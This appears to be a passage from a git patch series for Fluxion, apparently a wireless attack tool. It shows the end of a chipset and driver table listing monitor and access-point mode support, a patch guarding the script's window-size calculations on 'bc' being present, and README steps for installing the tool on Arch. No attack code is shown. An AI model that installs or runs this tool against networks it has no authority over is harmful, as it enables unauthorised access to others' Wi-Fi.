+brcmsmac + (a)/b/g/n + + + Conexant + + + + + + + + + + + + + + + Conexant + CX53111 + none + + + + + + + + SDIO + + b/g + + + Conexant + CX53822 + none + + + + + + + + CF + + (a)/b/g + + + Envara + WiND502/512 + none + + + + + + + + USB 2.0 + WiND512 (b/g) devices common + (a)/b/g + + + Inprocomm + IPN2120, IPN2220 + none + ? + + + + + + + PCI/CB + + b/(g) + + + Inprocomm + IPN2128 + none + ? + + + + + + + SDIO + + b + + + Intel + + + + + + + + + + + + + + + Intel + PRO/Wireless 2100B + ipw2100 + ? + y + y + n + n + y + ? + PCI + ipw2100 + b + + + Intel + PRO/Wireless 2200BG, 2915ABG + ipw2200 + WEP, WPA, WPA2 + y + y + oot + n + ? + ? + PCI + ipw2200 + (a)/b/g + + + Intel + PRO/Wireless 3945ABG + iwl3945 + WEP, WPA, WPA2 + y + y + n + n + y + y + PCI + iwl3945 + a/b/g + + + Intel + Wireless WiFi Link 4965AGN + iwl4965 + WEP, WPA, WPA2 + y + y + n + n + y + y + PCI + iwl4965 + a/b/g/n + + + Intel + WiFi Link 5100, 5150, 5300, 5350 - Centrino 100, 130, 1000, 1030, 6150, 6200, 6250, 6300 + iwlagn + WEP, WPA, WPA2 + y + y + n + n + y + y + PCI + iwlagn +iwlwifi + (a)/b/g/n + + + Intel + IWMC3200 (Evans Peak) + iwmc3200 + WEP, WPA, WPA2 + y + y + n + n + n + n + SDIO + iwmc3200 + a/b/g + + + Intersil + + + + + + + + + + + + + + + Intersil + PRISM 2/2.5/3 +PCI/CF/PCMCIA + hostap + ? + y + ? + y + n + y + y + PCI/CB /USB + hostap + b + + + Intersil + PRISM 2.5/3 USB + prism2_usb + WEP + y + ? + n + n + y + b + PCI/CB /USB + staging driver from linux-wlan-ng +prism2 usb + b + + + Intersil + ISL3877, ISL3880, +ISL3890, ISL3886 + p54pci + WEP, WPA, WPA2 + y + y + y + y + y + y + PCI/CB + p54pci + (a)/b/g + + + Intersil + ISL3880/ISL3886 ++ NET2280, ISL3887 + p54usb + WEP, WPA, WPA2 + y + y + y + y + y + y + USB 2.0 + p54usb + (a)/b/g + + + Lucent + HERMES I (WaveLAN +/IEEE/ORiNOCO) + orinoco + WEP, WPA-TKIP + y + y + n + n + y + oot + PCI/ PCMCIA/ USB 1.0 + no Bronze support +orinoco +orinoco usb + b + + + Marvell + + + + + + + + + + + + + + + Marvell +(Libertas) + 88W8310 + none + + + + + + + + PCI/CB + + b/g + + + Marvell +(Libertas) + 88W8335 + mrv8k + + + + + + + + PCI/CB + mrv8k + b/g + + + Marvell +(Libertas) + 88W8338 + none + + + + + + + + USB 2.0 + + b/g + + + Marvell +(Libertas) + 88W8385, +88W8388, 88W8686 + libertas + ? + y + y + n + n + n + n + USB/CF /SDIO + libertas + b/g + + + Marvell +(Libertas) + 88W8388 + libertas_tf + ? + y + n + y + ? + ? + ? + USB/CF /SDIO + OLPC XO-1, +supports mesh + b/g + + + Marvell +(TopDog) + 88W8360, 88W8361, +88W8362 (USB), +88W8362E, 88W8363 + none + + + + + + + + PCI/PCIe/ CB/USB2.0 + + (a)/b/g/n + + + Marvell +(TopDog/ +Avastar*) + 88W8366, 88W8863, +88W8687, 88W8764* + mwl8k + ? + y + ? + y + ? + y + ? + PCIe + mwl8k + (a)/b/g/n + + + Marvell +(Avastar) + 88W8797 (88W8786U) + mwifiex + ? + ? + ? + ? + ? + ? + ? + USB + 1286:2049 +mwifiex + a/b/g/n + + + Marvell +(Avastar) + 88W8786, 88W8787, +88W8797, 88W8897* + mwifiex + ? + ? + ? + ? + ? + ? + ? + SDIO + 02df:9139 +mwifiex + a/b/g/n (+ac)* + + + Marvell +(Avastar) + 88W8766, 88W8897* + mwifiex + ? + ? + ? + ? + ? + ? + ? + PCIe + 11ab:2b38 +mwifiex + a/b/g/n (+ac)* + + + Marvell +(Avastar) AC* + 88W8864*, 88W8897* + mwlwifi + ? + ? + ? + ? + ? + ? + ? + PCIe + iwlwifi +WRT1900 +iwlwifi + a/b/g/n (+ac)* + + + Marvell + unknown + mrvl_cb82 + + + + + + + + + + + + + MediaTek + + + + + + + + + + + + + + + MediaTek + MT5911N + none + + + + + + + + SDIO + + b/g + + + MediaTek + MT7601U + mt7601u + + + + + + + + USB + vendor driver + a/b/g/n + + + MediaTek + MT7610U + mt7601u + + + + + + + + USB + vendor driver + a/b/g/n (+ac)* + + + Metalink + MtW817x + none + + + + + + + + PCI + + a/(b)/(g)/n + + + No Wires Needed + Swallow + swallow_cs + WEP + y + ? + n + n + n + n + PCMCIA + obsolete out of kernel driver + b + + + No Wires Needed + Poldhu + poldhu + WEP + y + y + n + n + n + n + PCMCIA + obsolete out of kernel driver +poldhu cs + b + + + Ralink + + + + + + + + + + + + + + + Ralink + RT2460 + rt2400pci + ? + y + y + y + n + y + y + PCI/CB + + b + + + Ralink + RT2560 + rt2500pci + WEP, WPA, WPA2 + y + y + y + n + y + y + PCI/CB + + (a)/b/g + + + Ralink + RT2561, RT2561S, RT2661 + rt61pci + WEP, WPA, WPA2 + y + y + y + n + y + y + PCI/CB + + (a)/b/g + + + Ralink + RT2571, RT2572 + rt2500usb + WEP, WPA, WPA2 + y + y + y + n + y + y + USB 2.0 + + (a)/b/g + + + Ralink + RT2571W, RT2573, RT2671 + rt73usb + WEP, WPA, WPA2 + y + y + y + n + y + y + USB 2.0 + + (a)/b/g + + + Ralink + RT2760, RT2790, RT2860, RT2880, RT2890, RT3052, RT3090, RT3091, RT3092, RT3390, RT3060, RT3062, RT3562, RT3592, RT5390, RT3290 + rt2800pci + WEP, WPA, WPA2 + y + ? + y + ? + y + y + PCI/PCIe /CB + Wiki + (a)/b/g/n + + + Ralink + RT2760, RT2790, RT2860, RT2880, RT2890, RT3052, RT309x + rt2860sta + WEP, WPA, WPA2 + y + ? + y + ? + y + n + PCI/PCIe /CB + vendor driver + (a)/b/g/n + + + Ralink + RT2770, RT2870, RT2070, RT3070, RT3071, RT3072, RT3370, RT3572, RT5370, RT5572, RT8070 + rt2800usb + WEP, WPA, WPA2 + y + y + y + y (??) + y + y + USB 2.0 + Wiki + (a)b/g/(n) + + + Ralink + RT2770, RT2870, RT2070, RT307x + rt2870sta + WEP, WPA, WPA2 + y + ? + ? + n + n + n + USB 2.0 + vendor driver + (a)/b/g/(n) + + + Ralink + RT3572 + rt3572sta + WEP, WPA, WPA2 + y + ? + ? + ? + n + n + USB 2.0 + + a/b/g/n + + + Ralink + RT3573 + none + + + + + + + + USB 2.0 + three stream + a/b/g/n + + + Realtek + + + + + + + + + + + + + + + Realtek + RTL8180L, RTL8185L, +RTL8187SE (3.15+) + rtl8180 + WEP, WPA, WPA2 + y + n + n + n + y + ? + PCI/CB + + b/(g) + + + Realtek + RTL8187L, RTL8187B + rtl8187 + WEP, WPA, WPA2 + y + n + n + n + y + y + USB 2.0 + + b/g + + + Realtek + RTL8187SE + rtl8187se + WEP, WPA, WPA2 + y + ? + ? + ? + ? + ? + PCI + + b/g + + + Realtek + RTL8190 + r8190_pci + ? + ? + ? + ? + ? + ? + ? + PCI +/ CB + vendor driver + b/g/n + + + Realtek + RTL8192E + r8192e_pci + WEP, WPA, WPA2 + y + ? + ? + ? + ? + ? + PCIe + staging (vendor) driver + (a)/b/g/n + + + Realtek + RTL8191SE, RTL8192SE + rtl8192se + WEP, WPA, WPA2 + y + ? + ? + ? + ? + ? + PCIe + + b/g/n + + + Realtek + RTL8192U + r8192u_usb + WEP, WPA, WPA2 + y + ? + ? + ? + ? + ? + USB 2.0 + staging (vendor) driver + b/g/n + + + Realtek + RTL8188SU, RTL8191SU, RTL8192SU + r8712u + WEP, WPA, WPA2 + y + ? + ? + ? + ? + n + USB 2.0 + staging (vendor) driver + b/g/n + + + Realtek + RTL8188SU, RTL8191SU, RTL8192SU + r8192s_usb + WEP, WPA, WPA2 + y + ? + ? + ? + y + ? + USB 2.0 + staging (vendor) driver, superseded by r8712u + b/g/n + + + Realtek + RTL8188CE, RTL8192CE + rtl8192ce + WEP, WPA, WPA2 + y + ? + ? + ? + ? + n + PCIe + + b/g/n + + + Realtek + RTL8188CUS, RTL8192CU, RTL8188RU + rtl8192cu + WEP, WPA, WPA2 + y + y + n + ? + y + n + USB 2.0 + + b/g/n + + + Realtek + RTL8192DU + rtl8192du + WEP, WPA, WPA2 + y + ? + ? + ? + ? + ? + USB 2.0 + driver available here, may panic on init on some kernels + a/b/g/n + + + Realtek + RTL8192DE + rtl8192de + WEP, WPA, WPA2 + y + ? + ? + ? + ? + n + PCIe + + a/b/g/n + + + Renesas + + + + + + + + + + + + + + + Renesas + KS7010 + ks7010 + ? + ? + ? + ? + ? + ? + ? + SDIO + from Javi Roman + b + + + ShareWave / Cirrus Logic + Bodega + none + + + + + + + + PCI/ PCMCIA/ USB 1.0 + rare devices, support the proprietary Whitecap protocol + b + + + SiS + 160 + sis160 + ? + y + ? + n + n + n + n + PCI + rare devices, driver is a useless binary blob + b + + + SiS + 162, 162U + sis162 + ? + y + y + n + n + n + n + PCI/ USB 2.0 + driver is a useless binary blob + b + + + SiS + 163, 163U + none + + + + + + + + PCI/CF/ USB 2.0 + + b/g + + + ST-Ericsson + CW1100, CW1200 + cw1200 + + + + + + + + SDIO +/ PCI + (since 3.11) + b/g + + + ST-NXP + STLC4560 + p54spi + WEP, WPA, WPA2 + y + y + y + y + y + y + SPI + + b/g + + + Symbol + Spectrum24 DS + orinoco + WEP + y + ? + n + n + y + n + PCI/ PCMCIA + orinoco + b + + + Syntek/3DSP + unknown +(Bluew-2310x) + none + ? + + + + + + + PCI + compiled modules available + b/g + + + Syntek/3DSP + STK9100+STK9230 +(Bluew-2310u) + 3dspusbwlan + ? + + + + + + + USB 2.0 + partial source? + b/g + + + Texas Instruments + + + + + + + + + + + + + + + Texas Instruments + ACX100 (TNETW1100), ACX101 (TNETW1100B), ACX111 (TNETW1130), TNETW1450 + acx1xx + WEP, WPA, WPA2 + y + ? + n + n + y + ? + PCI/CB /USB + acx100 +acx + b/(g) + + + Texas Instruments + WL1251 + wl1251 + WEP, WPA, WPA2 + y + y + n + ? + y + ? + SPI/ SDIO + + b/g + + + Texas Instruments + WL1271 + wl1271 + WEP, WPA, WPA2 + y + y + y + n + n + n + SPI/ SDIO + + (a)/b/g/n + + + VIA + VT6551 + none + ? + ? + ? + ? + ? + ? + ? + PCI + + b + + + VIA + VT6555 + vt6655 + ? + y + ? + ? + ? + ? + n + PCI + staging (vendor) driver +vt6656 + (a)/b/g + + + VIA + VT6556 + vt6656 + ? + y + ? + ? + ? + ? + n + PCI + staging (vendor) driver +vt6656 + (a)/b/g + + + WavePlus + WP1200 + none + + + + + + + + PCI/ PCMCIA + devices not common + b + + + Winbond + W89C33D + none + + + + + + + + PCI + devices not common + b/g + + + Winbond + W89C35D + winbond + ? + y + ? + n + n + n + n + USB 2.0 + staging (vendor) driver only supports 'b' +w35und + b/g + + + ZyDAS + + + + + + + + + + + + + + + ZyDAS + ZD1201 + zd1201 + WEP + y + ? + ? + ? + y + ? + USB 1.0 + zd1201 + b + + + ZyDAS + ZD1201 + zdsta + WEP + y + ? + ? + ? + ? + n + USB 1.0 + obsolete vendor driver + b + + + ZyDAS + ZD1201 + zdsta + WEP + y + ? + ? + ? + ? + n + PCMCIA + obsolete vendor driver, devices not common + b + + + ZyDAS + ZD1202 + zdsta + WEP + + + + + + n + PCI/CB/ PCMCIA + obsolete vendor driver, devices not common + b + + + ZyDAS + ZD1211/ZD1211B + zd1211rw + WEP, WPA, WPA2 + y + y + y + y + y + y + USB 1.0 + 5GHz band not supported, no hw crypto +zd1211rw + (a)/b/g + + + ZyDAS + ZD1212/ZD1212B + zd1212 + WEP, WPA, WPA2 + y + y + y + + + n + PCI/CB + obsolete vendor driver, devices not common + (a)/b/g + + + Manufacturer + Chipset + Driver + Station + Ad-hoc + AP + Monitor + Bus + Notes + + + + PHY Modes + + + Aironet + ARLAN + arlan + ? + ? + ? + ? + ISA + driver abandoned + + + + pre-b (900MHz or 2.4GHz) + + + Lucent + WaveLAN + wavelan + ? + ? + ? + ? + PCMCIA/ISA + driver abandoned + + + + pre-b (900MHz or 2.4GHz) + + + Raytheon + Raylink + ray_cs + ? + ? + ? + ? + PCMCIA + USB variants not supported + + + + 2.4GHz FHSS + + + ShareWave + chipset before +Bodega (Epic?) + none + + + + + PCI/PCMCIA + uncommon devices + + + + Whitecap + + + Symbol + Spectrum24 FHSS + none + + + + + PCMCIA + + + + + 2.4GHz FHSS + + + Xircom + Netwave + netwave_cs + ? + ? + ? + ? + PCMCIA + driver abandoned + + + + pre-b, 1Mb + + + AMD + Am79C930 +(presumably) + wl3501_cs + ? + ? + ? + ? + PCMCIA + PRISM I based RF + + + + 2Mb, pre-802.11b + \ No newline at end of file From e5beddfe1a313e23cad67463cb5de07466bbb909 Mon Sep 17 00:00:00 2001 From: deltaxflux Date: Sun, 22 Apr 2018 13:24:14 +0200 Subject: [PATCH 17/18] Disable screen ratio calculation if bc isn't installed --- fluxion.sh | 44 +++++++++++++++++++++++--------------------- 1 file changed, 23 insertions(+), 21 deletions(-) diff --git a/fluxion.sh b/fluxion.sh index e422c9a..b235eb2 100755 --- a/fluxion.sh +++ b/fluxion.sh @@ -467,33 +467,35 @@ fluxion_set_resolution() { # Windows + Resolution SCREEN_SIZE_Y=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $2}')) # Calculate proportional windows - PROPOTION=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$SCREEN_SIZE_Y}")/1 | bc) - NEW_SCREEN_SIZE_X=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$FLUXIONWindowRatio}")/1 | bc) - NEW_SCREEN_SIZE_Y=$(echo $(awk "BEGIN {print $SCREEN_SIZE_Y/$FLUXIONWindowRatio}")/1 | bc) + if hash bc ;then + PROPOTION=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$SCREEN_SIZE_Y}")/1 | bc) + NEW_SCREEN_SIZE_X=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$FLUXIONWindowRatio}")/1 | bc) + NEW_SCREEN_SIZE_Y=$(echo $(awk "BEGIN {print $SCREEN_SIZE_Y/$FLUXIONWindowRatio}")/1 | bc) - NEW_SCREEN_SIZE_BIG_X=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_X/$FLUXIONWindowRatio}")/1 | bc) - NEW_SCREEN_SIZE_BIG_Y=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_Y/$FLUXIONWindowRatio}")/1 | bc) + NEW_SCREEN_SIZE_BIG_X=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_X/$FLUXIONWindowRatio}")/1 | bc) + NEW_SCREEN_SIZE_BIG_Y=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_Y/$FLUXIONWindowRatio}")/1 | bc) - SCREEN_SIZE_MID_X=$(echo $(($SCREEN_SIZE_X + ($SCREEN_SIZE_X - 2 * $NEW_SCREEN_SIZE_X) / 2))) - SCREEN_SIZE_MID_Y=$(echo $(($SCREEN_SIZE_Y + ($SCREEN_SIZE_Y - 2 * $NEW_SCREEN_SIZE_Y) / 2))) + SCREEN_SIZE_MID_X=$(echo $(($SCREEN_SIZE_X + ($SCREEN_SIZE_X - 2 * $NEW_SCREEN_SIZE_X) / 2))) + SCREEN_SIZE_MID_Y=$(echo $(($SCREEN_SIZE_Y + ($SCREEN_SIZE_Y - 2 * $NEW_SCREEN_SIZE_Y) / 2))) - # Upper windows - TOPLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0+0" - TOPRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+0" - TOP="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X+0" + # Upper windows + TOPLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0+0" + TOPRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+0" + TOP="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X+0" - # Lower windows - BOTTOMLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-0" - BOTTOMRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0-0" - BOTTOM="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X-0" + # Lower windows + BOTTOMLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-0" + BOTTOMRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0-0" + BOTTOM="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X-0" - # Y mid - LEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-$SCREEN_SIZE_MID_Y" - RIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+$SCREEN_SIZE_MID_Y" + # Y mid + LEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-$SCREEN_SIZE_MID_Y" + RIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+$SCREEN_SIZE_MID_Y" - # Big - TOPLEFTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y+0+0" - TOPRIGHTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y-0+0" + # Big + TOPLEFTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y+0+0" + TOPRIGHTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y-0+0" + fi } From 145c6b134ccb7337a9d42c5832f7088b6caff92d Mon Sep 17 00:00:00 2001 From: deltax Date: Sun, 22 Apr 2018 14:01:35 +0200 Subject: [PATCH 18/18] Add arch installation --- README.md | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/README.md b/README.md index d11777b..25ea3a3 100644 --- a/README.md +++ b/README.md @@ -20,6 +20,17 @@ cd fluxion ./fluxion.sh ``` +**Fluxion is also available in arch** +``` +cd bin/arch +makepkg +``` + +or using the blackarch repo +``` +pacman -S fluxion +``` + ## :scroll: Changelog Fluxion gets weekly updates with new features, improvements, and bugfixes. Be sure to check out the [changelog here](https://github.com/FluxionNetwork/fluxion/commits/master).